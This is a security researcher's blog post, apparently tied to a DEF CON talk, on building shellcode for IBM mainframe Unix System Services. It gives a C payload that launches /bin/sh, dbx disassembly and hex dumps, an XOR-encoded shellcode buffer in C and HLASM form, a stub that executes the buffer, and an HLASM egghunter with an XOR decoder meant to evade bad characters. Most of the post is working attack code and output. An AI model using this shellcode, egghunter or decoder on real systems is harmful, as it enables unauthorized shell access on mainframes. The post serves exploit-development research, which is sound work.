Building shellcode, egghunters and decoders.

Creating shellcode for Unix System Services (USS) on System z (mainframe) takes the same disciplines as the equivalent work on Intel platforms. What differs is the syntax, the assembler mnemonics, the available tools, and the debugging utilities. There are certainly other ways to go about it, and I’m still refining my favorites. What follows is one of my early successful attempts.

If you have never created shellcode from scratch, including a hand-hewn encoder for zapping bad characters, I recommend you do so first on a well-documented platform. Become familiar with basic but powerful tools for the task, such as dd, od, and gdb, along with basic Python scripting.

The process I followed to develop shellcode for mainframe USS is a common, tried-and-true one that uses only basic tools available on the platform. At a high level, it looks like this:

1)  Develop a working payload. Here, for example, is a simple C program that launches a shell. Note that this program uses hard-coded strings, lengths, and pointers to keep the resulting assembler as simple as possible. See previous posts on how to find the callable services that make this possible.

#include <string.h>
typedef void nullf();

int main(){
        unsigned int zeroint = 0;
        unsigned int sevenint = 7;
        unsigned char *zerochr = (unsigned char *)&zeroint;
        void (*Exit_routine_address)()=0;

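        /* Chase four 4-byte pointers, starting at absolute address 16,
           to reach the callable service entry point (see earlier posts). */
        unsigned char *addr = 0;
        memcpy(&(addr),(addr)+16,4);
        memcpy(&(addr),(addr)+544,4);
        memcpy(&(addr),(addr)+24,4);
        memcpy(&(addr),(addr)+228,4);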

        ((nullf *)addr)(
              &sevenint,
              "/bin/sh",
              &zeroint,
              *zerochr,
              *zerochr,
              &zeroint,
              *zerochr,
              *zerochr,
              &zeroint,
              *zerochr,
              &zeroint,
              &zeroint,
              &zeroint);
        return 0;
}
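
The four memcpy calls above do nothing more than chase a chain of 4-byte pointers. As a rough illustration, here is a small Python model of that walk over a made-up big-endian memory image. The offsets come from the C program; the addresses (0x1000, 0x2000 and so on) and the helper names are invented for the example and do not correspond to real control-block locations.

```python
import struct

# Offsets taken from the memcpy calls in the C program above.
CHAIN_OFFSETS = (16, 544, 24, 228)


def follow_chain(memory: bytes, offsets=CHAIN_OFFSETS) -> int:
    """Follow a chain of 4-byte big-endian pointers, starting at address 0."""
    addr = 0
    for off in offsets:
        # Same effect as memcpy(&addr, addr + off, 4) on a big-endian machine.
        (addr,) = struct.unpack_from(">I", memory, addr + off)
    return addr


def build_fake_memory() -> bytearray:
    """Hypothetical memory image with invented addresses, for demonstration."""
    mem = bytearray(0x4000)
    struct.pack_into(">I", mem, 16, 0x1000)             # address 16 -> block A
    struct.pack_into(">I", mem, 0x1000 + 544, 0x2000)   # block A + 544 -> block B
    struct.pack_into(">I", mem, 0x2000 + 24, 0x3000)    # block B + 24 -> table
    struct.pack_into(">I", mem, 0x3000 + 228, 0x3F00)   # table + 228 -> entry point
    return mem


if __name__ == "__main__":
    print(hex(follow_chain(bytes(build_fake_memory()))))
```

The final value is what the C program casts to a function pointer and calls.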

2) Use a C compiler that can emit assembler (if you aren’t writing in HLASM to begin with) to help decide which bytes are relevant. IBM’s xlc compiler with the Metal C option, invoked as shown below, works nicely. Note that the assembly generated here is IBM’s HLASM (High Level Assembler) source, which is still one step removed from the actual machine instructions and the bytes that encode them. To see those, use the debugger, dbx.

xlc -S -qmetal pgm.c

3)  The primary debugger I’m using, dbx, can easily save memory dumps to a file.  These can be formatted to create simple shellcode.  Example:

0x1f175e90 (???)       90ebd00c     STM     R14,R11,12(R13)
0x1f175e94 (???)       c0f0fffffffe LARL    R15,*-4
0x1f175e9a (???)       5800f028     L       R0,40(,R15)
0x1f175e9e (???)       58f0f02c     L       R15,44(,R15)
0x1f175ea2 (???)       58e00010     L       R14,16
0x1f175ea6 (???)       58ee0304     L       R14,772(R14)
0x1f175eaa (???)       58ee00a0     L       R14,160(R14)
0x1f175eb2 (???)       a7f40007     BRC     15,*+14
...
0x1f175ec0 (???)       18fd         LR      R15,R13
0x1f175ec2 (???)       18d1         LR      R13,R1
0x1f175ec4 (???)       50f0d004     ST      R15,4(,R13)
0x1f175ec8 (???)       50d0f008     ST      R13,8(,R15)
0x1f175ecc (???)       5810f018     L       R1,24(,R15)
0x1f175ed0 (???)       41a000d8     LA      R10,216
0x1f175ed4 (???)       1ead         ALR     R10,R13
0x1f175ed6 (???)       50a0d048     ST      R10,72(,R13)
0x1f175eda (???)       c03000000077 LARL    R3,*+238
0x1f175ee0 (???)       ebebd0940026 STMH    R14,R11,148(R13)
0x1f175ee6 (???)       c0b000000075 LARL    R11,*+234
0x1f175eec (???)       41200000     LA      R2,0
0x1f175ef0 (???)       5020d080     ST      R2,128(,R13)
0x1f175ef4 (???)       41e00007     LA      R14,7
0x1f175ef8 (???)       50e0d084     ST      R14,132(,R13)
0x1f175efc (???)       41e0d080     LA      R14,128(,R13)
.......
0x1f175f00 (???)       50e0d088     ST      R14,136(,R13)
0x1f175f04 (???)       18e2         LR      R14,R2
0x1f175f06 (???)       50e0d090     ST      R14,144(,R13)
0x1f175f0a (???)       d203d090e010 MVC     144(4,R13),16(R14)
0x1f175f10 (???)       58e0d090     L       R14,144(,R13)
0x1f175f14 (???)       d203d090e220 MVC     144(4,R13),544(R14)
0x1f175f1a (???)       58e0d090     L       R14,144(,R13)
0x1f175f1e (???)       d203d090e018 MVC     144(4,R13),24(R14)
0x1f175f24 (???)       58e0d090     L       R14,144(,R13)
0x1f175f28 (???)       d203d090e0e4 MVC     144(4,R13),228(R14)
0x1f175f2e (???)       58e0d088     L       R14,136(,R13)
......
(dbx64) 0x1f175e90/0xf4h
1f175e90:  90 eb d0 0c c0 f0 ff ff ff fe 58 00 f0 28 58 f0
1f175ea0:  f0 2c 58 e0 00 10 58 ee 03 04 58 ee 00 a0 b2 18
1f175eb0:  e0 00 a7 f4 00 07 00 00 00 10 00 d8 00 00 00 06
1f175ec0:  18 fd 18 d1 50 f0 d0 04 50 d0 f0 08 58 10 f0 18
1f175ed0:  41 a0 00 d8 1e ad 50 a0 d0 48 c0 30 00 00 00 77
1f175ee0:  eb eb d0 94 00 26 c0 b0 00 00 00 75 41 20 00 00
1f175ef0:  50 20 d0 80 41 e0 00 07 50 e0 d0 84 41 e0 d0 80
1f175f00:  50 e0 d0 88 18 e2 50 e0 d0 90 d2 03 d0 90 e0 10
1f175f10:  58 e0 d0 90 d2 03 d0 90 e2 20 58 e0 d0 90 d2 03
1f175f20:  d0 90 e0 18 58 e0 d0 90 d2 03 d0 90 e0 e4 58 e0
1f175f30:  d0 88 1f 00 43 00 e0 00 58 f0 d0 90 41 e0 d0 80
1f175f40:  41 40 d0 84 41 10 d0 4c 50 40 d0 4c 18 4b 50 40
1f175f50:  d0 50 50 e0 d0 54 50 00 d0 58 50 00 d0 5c 50 e0
1f175f60:  d0 60 50 00 d0 64 50 00 d0 68 50 e0 d0 6c 50 00
1f175f70:  d0 70 50 e0 d0 74 50 e0 d0 78 50 e0 d0 7c d2 03
1f175f80:  d0 08 d0 48
(dbx64) 0x1f175e90/0xf4h > tmp.buf
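
A saved dump like the one above still has to be turned back into raw bytes before it can be formatted. A minimal sketch of that step, assuming every data line has the `address:  hh hh ...` layout shown here (the function name and the regular expression are mine, and other dbx versions may format the dump differently):

```python
import re

# Matches one dump line in the layout shown above, e.g.
# "1f175e90:  90 eb d0 0c ..." (address, colon, then hex byte pairs).
DUMP_LINE = re.compile(r"^\s*[0-9a-fA-F]+:\s+((?:[0-9a-fA-F]{2}\s*)+)$")


def parse_dbx_dump(text: str) -> bytes:
    """Collect the hex byte columns of a saved dump into raw bytes."""
    out = bytearray()
    for line in text.splitlines():
        match = DUMP_LINE.match(line)
        if match is None:
            continue  # skip an echoed command, blank lines, anything else
        out += bytes.fromhex("".join(match.group(1).split()))
    return bytes(out)


if __name__ == "__main__":
    sample = """(dbx64) 0x1f175e90/0xf4h
1f175e90:  90 eb d0 0c c0 f0 ff ff ff fe 58 00 f0 28 58 f0
1f175f80:  d0 08 d0 48
"""
    raw = parse_dbx_dump(sample)
    print(len(raw), raw[:4].hex())
```

Reading tmp.buf with `open("tmp.buf").read()` and writing the result back out in binary mode gives a file that od and dd can work with directly.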

4)  Format the shellcode. I use a Python script for this, which takes the binary name, output file name, beginning offset, and ending offset. The output can be either a C-style buffer or an assembler constant declaration for use in another assembly program (such as the decoder used to de-obfuscate it). This one is built with each byte XOR’d with 0x01 to remove nulls.

*Number of bytes:  240
*Enc buffer char:  0x1
*
*ASM buffer:
         DC    X'91edd10dc1f1fefefeff198ec1b10101016351d1b10519daa60401X
               06c3d6e6f0c4e6c2410101c101fefefefa16100b09510181cd59f181X
               cdc1e101010142407181e151718189407181d95171818d407181d151X
               71819151718195517181995171819d517181a1517181a5517181a951X
               7181ad517181b1517181b5517181b940'
         DC    X'11818946f181bd0101010101010101010101010101010101010101X
               01010101010101010101010101010101010101010101010101010101X
               01018101010104ee59d1b10599edd10d16fe06ff0101010101010101X
               0101010101016083889460a389010101010601010101dfacbfeef1f1X
               f1f1'

Encoded C buffer:
"\x91\xed\xd1\x0d\xc1\xf1\xfe\xfe\xfe\xff\x19\x8e\xc1\xb1\x01\x01"
"\x01\x63\x51\xd1\xb1\x05\x19\xda\xa6\x04\x01\x06\xc3\xd6\xe6\xf0"
"\xc4\xe6\xc2\x41\x01\x01\xc1\x01\xfe\xfe\xfe\xfa\x16\x10\x0b\x09"
"\x51\x01\x81\xcd\x59\xf1\x81\xcd\xc1\xe1\x01\x01\x01\x42\x40\x71"
"\x81\xe1\x51\x71\x81\x89\x40\x71\x81\xd9\x51\x71\x81\x8d\x40\x71"
"\x81\xd1\x51\x71\x81\x91\x51\x71\x81\x95\x51\x71\x81\x99\x51\x71"
"\x81\x9d\x51\x71\x81\xa1\x51\x71\x81\xa5\x51\x71\x81\xa9\x51\x71"
"\x81\xad\x51\x71\x81\xb1\x51\x71\x81\xb5\x51\x71\x81\xb9\x40\x11"
"\x81\x89\x46\xf1\x81\xbd\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x81\x01\x01\x01\x04\xee\x59\xd1"
"\xb1\x05\x99\xed\xd1\x0d\x16\xfe\x06\xff\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x60\x83\x88\x94\x60\xa3\x89\x01"
"\x01\x01\x01\x06\x01\x01\x01\x01\xdf\xac\xbf\xee\xf1\xf1\xf1\xf1"

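The formatting script itself is not reproduced in this post. As a stand-in, here is a minimal sketch of the two steps it performs: a single-byte XOR, then rendering as either a C buffer or HLASM DC statements. The function names are hypothetical, and unlike the output above this version emits one short DC per line rather than using column-72 continuation.

```python
def xor_encode(data: bytes, key: int) -> bytes:
    """XOR every byte with a single-byte key (the same call decodes)."""
    return bytes(b ^ key for b in data)


def to_c_buffer(data: bytes, per_line: int = 16) -> str:
    """Render bytes as quoted C string literals, per_line bytes per row."""
    rows = []
    for i in range(0, len(data), per_line):
        row = "".join(f"\\x{b:02x}" for b in data[i:i + per_line])
        rows.append(f'"{row}"')
    return "\n".join(rows)


def to_hlasm_dc(data: bytes, per_line: int = 24) -> str:
    """Render bytes as one DC X'..' statement per row.

    The opcode starts in column 10 and the operand in column 16. With 24
    bytes per row the closing quote lands in column 66, short of the
    continuation column (72), so no continuation handling is needed.
    """
    rows = []
    for i in range(0, len(data), per_line):
        rows.append(" " * 9 + "DC    X'" + data[i:i + per_line].hex() + "'")
    return "\n".join(rows)


if __name__ == "__main__":
    raw = bytes.fromhex("90ebd00cc0f0fffffffe5800f028")
    enc = xor_encode(raw, 0x01)
    print(f"*Number of bytes:  {len(enc)}")
    print(f"*Enc buffer char:  {0x01:#x}")
    print(to_hlasm_dc(enc))
    print(to_c_buffer(enc))
```

Keeping each DC on one line trades a longer listing for not having to place a continuation character in exactly the right column.
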
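5)  Test with a stub program. The following is a tried-and-true method for jumping to your buffer. Note that the bytes shown here are the XOR-encoded buffer from step 4, so they need a decoder in front of them before they will run; to test the raw payload, substitute the unencoded bytes.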

int main() {
        unsigned char sc[] =
"\x91\xed\xd1\x0d\xc1\xf1\xfe\xfe\xfe\xff\x19\x8e\xc1\xb1\x01\x01"
"\x01\x63\x51\xd1\xb1\x05\x19\xda\xa6\x04\x01\x06\xc3\xd6\xe6\xf0"
"\xc4\xe6\xc2\x41\x01\x01\xc1\x01\xfe\xfe\xfe\xfa\x16\x10\x0b\x09"
"\x51\x01\x81\xcd\x59\xf1\x81\xcd\xc1\xe1\x01\x01\x01\x42\x40\x71"
"\x81\xe1\x51\x71\x81\x89\x40\x71\x81\xd9\x51\x71\x81\x8d\x40\x71"
"\x81\xd1\x51\x71\x81\x91\x51\x71\x81\x95\x51\x71\x81\x99\x51\x71"
"\x81\x9d\x51\x71\x81\xa1\x51\x71\x81\xa5\x51\x71\x81\xa9\x51\x71"
"\x81\xad\x51\x71\x81\xb1\x51\x71\x81\xb5\x51\x71\x81\xb9\x40\x11"
"\x81\x89\x46\xf1\x81\xbd\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x81\x01\x01\x01\x04\xee\x59\xd1"
"\xb1\x05\x99\xed\xd1\x0d\x16\xfe\x06\xff\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x60\x83\x88\x94\x60\xa3\x89\x01"
"\x01\x01\x01\x06\x01\x01\x01\x01\xdf\xac\xbf\xee\xf1\xf1\xf1\xf1";

        int (*ret)();
        ret = (int(*)())(sc);
        (int)(*ret)();
        return 0;
}

Once you have working shellcode, it’s time to remove bad characters (such as null bytes, 0x00) so the string can be copied across the network, piped on a command line, or read from an environment variable (or delivered by whichever method you choose).
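
Before choosing an encoding it helps to know where the bad characters are and which single-byte XOR keys would clear them. A small sketch of both checks follows; the function names and the default bad-character set (just 0x00) are assumptions for the example, so extend the set to match your delivery method.

```python
def find_bad_bytes(data: bytes, bad=(0x00,)) -> list:
    """Return (offset, value) for every byte of data that is a bad character."""
    return [(i, b) for i, b in enumerate(data) if b in bad]


def candidate_xor_keys(data: bytes, bad=(0x00,)) -> list:
    """Single-byte keys that leave no bad character in the encoded output."""
    present = set(data)
    keys = []
    for key in range(1, 256):
        if key in bad:
            continue  # the key itself appears in the decoder, so keep it clean
        if all((b ^ key) not in bad for b in present):
            keys.append(key)
    return keys


if __name__ == "__main__":
    raw = bytes.fromhex("90ebd00c5800f028")
    print(find_bad_bytes(raw))
    print([hex(k) for k in candidate_xor_keys(raw)[:4]])
```

With only 0x00 in the bad set, a key is usable exactly when that key value does not itself occur in the payload, since a byte XOR'd with itself is zero.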

Since there are no virus protection programs on mainframe systems (yet?), simple encoding should suffice. Here’s a stub I wrote in HLASM that finds the buffer with an egg hunter (for ease of separation later), then simply XORs a block of code with a static byte to yield the original shellcode (which was XOR’d with the same byte beforehand to eliminate bad characters).

The offsets will depend on buffer size and location. The plan is to refine this and combine it with the scripts that build the above into a tool set that can easily generate workable shellcode. The obtuse coding is a combination of this being an early draft and the need to avoid any 00 bytes in the resulting object code.

         AFI   1,X'01010102'   # this value
         AFI   2,X'01010103'   # xor'd with this one
         XR    1,2             # yields a 1 in R1
         LR    4,1             # copy the 1 into R4
         SLA   4,1(1)          # shift left 1+R1 = 2 bits: R4 == 4
         XR    10,10           # zero out R10 for our egg
         XR    2,2             # zero R2
         LGFI  10,X'deadbeef'  # load egghunter value into R10
         LR    11,12           # load base into R11
LOOPER   AR    11,1            # add 1 to R11
         L     3,1(2,11)       # value at R11+1 (index R2 = 0)
         CR    10,3            # compare egg with value at R11 ptr
         BRC   7,LOOPER        # branch on anything but equal
         AR    11,4            # add 4 to R11
         L     3,1(2,11)       # value at R11+1 (R2 index is 0)
         CR    10,3            # compare egg with value at R11 ptr
         BRC   7,LOOPER        # 2nd check: 2 in a row, good to go!
         XR    2,2             # zero 2 for division
         XR    3,3             # zero 3 for division
         AR    11,1            # 1 for the offset from above
         SR    11,4            # 4 to skip last egg
         ST    13,4(,11)       # store sp for later in wkg area
         ST    11,8(,13)       # store sc addr in wkg area
....
** Begin main decoding routine    **
         LR    3,11            # copy egg addr into R3
         AR    3,4             # add 4 to 3
         AR    3,4             # add 4 to 3
         AR    3,4             # add 4 to 3
         AR    3,4             # add 4 to 3, points to SC now
         LR    5,3             # save sc addr in R5 - dont mod
         SR    3,1             # dec R3 by 1 (for nulls (& lulz?))
*  R3 now holds addr-1 of our sc
         LR    4,1             # put 1 in R4
         XR    1,1             # zero out R1
         XR    2,2             # zero out R2
* put the XOR key (enc buffer char) from buf in the quotes below
         XI    1(3),X'01'      # xor byte with key (r3 offset by 1)
LOOP2    AR    1,4             # add 1 to R1
         ARK   2,3,1           # add r3 to r1 ctr, yielding r2 ptr
* put the XOR key (enc buffer char) from buf in the quotes below
         XI    1(2),X'01'      # xor byte with key
* put the buffer len (# of bytes) in the next cmd in CHI 1,<here>
* may need to increase size above 256 to remove 00's from obj code
         CHI   1,257           # to yield sc len
         BRC   4,LOOP2         # loop bwd 18 bytes if R1 < size
         XR    4,4
......
         DC    X'DEADBEEF'     # egg
         DC    X'DEADBEEF'
         DC    X'DEADBEEF'
         DC    X'DEADBEEF'
......
*Number of bytes:     240
*Enc buffer char:     0x1
         DC    X'91edd10dc1f1fefefeff198ec1b10101016351d1b10519daa60401X
               06c3d6e6f0c4e6c2410101c101fefefefa16100b09510181cd59f181X
               cdc1e101010142407181e151718189407181d95171818d407181d151X
               71819151718195517181995171819d517181a1517181a5517181a951X
               7181ad517181b1517181b5517181b940'
         DC    X'11818946f181bd0101010101010101010101010101010101010101X
               01010101010101010101010101010101010101010101010101010101X
               01018101010104ee59d1b10599edd10d16fe06ff0101010101010101X
               0101010101016083889460a389010101010601010101dfacbfeef1f1X
               f1f1'
.....
         DC    X'8BADF00D'     eof marker
         END
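
To make the control flow of the stub easier to follow, here is a simplified Python model of the same idea: scan memory for two eggs in a row, skip the four egg words, and XOR the bytes that follow with the key. It is only a sketch. The function names are mine, and it does not reproduce the register tricks or the deliberately oversized loop count (257) used above to keep 00 bytes out of the object code.

```python
EGG = bytes.fromhex("deadbeef")


def hunt_egg(mem: bytes, start: int = 0) -> int:
    """Return the offset of the first place the egg occurs twice in a row."""
    pos = mem.find(EGG, start)
    while pos >= 0:
        if mem[pos + 4:pos + 8] == EGG:
            return pos
        pos = mem.find(EGG, pos + 1)
    raise ValueError("egg pair not found")


def decode_in_place(mem: bytearray, length: int, key: int,
                    egg_words: int = 4, start: int = 0) -> int:
    """XOR `length` bytes that follow the egg words; return their offset."""
    sc = hunt_egg(bytes(mem), start) + 4 * egg_words
    for i in range(sc, sc + length):
        mem[i] ^= key
    return sc


if __name__ == "__main__":
    payload = bytes.fromhex("90ebd00c18fd")
    encoded = bytes(b ^ 0x01 for b in payload)
    # A lone egg sits ahead of the real four-word marker on purpose.
    mem = bytearray(b"\x07\x07" + EGG + b"\x07\x07\x07" + EGG * 4
                    + encoded + bytes.fromhex("8badf00d"))
    at = decode_in_place(mem, len(encoded), 0x01)
    print(at, mem[at:at + len(payload)].hex())
```

Requiring two eggs in a row presumably keeps the hunter from stopping on the single copy of the egg embedded in its own LGFI instruction, which is why the demo plants a lone egg before the real marker.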

More to come on the details and inner workings of these steps, as well as ideas about fuzzing / finding vulnerable USS apps and what to do if you find one. Have I piqued your interest? If so, make sure you see my talk at DEFCON23 on Saturday, August 8 at 5pm in Las Vegas.

Some great resources:

z/Architecture Principles of Operation

DBX debugger for UNIX

Note – the above examples are not meant to be followed as a step-by-step how-to.   Rather, they are meant to get the reader started, with ideas and examples that can easily be modified or expanded upon to create working models.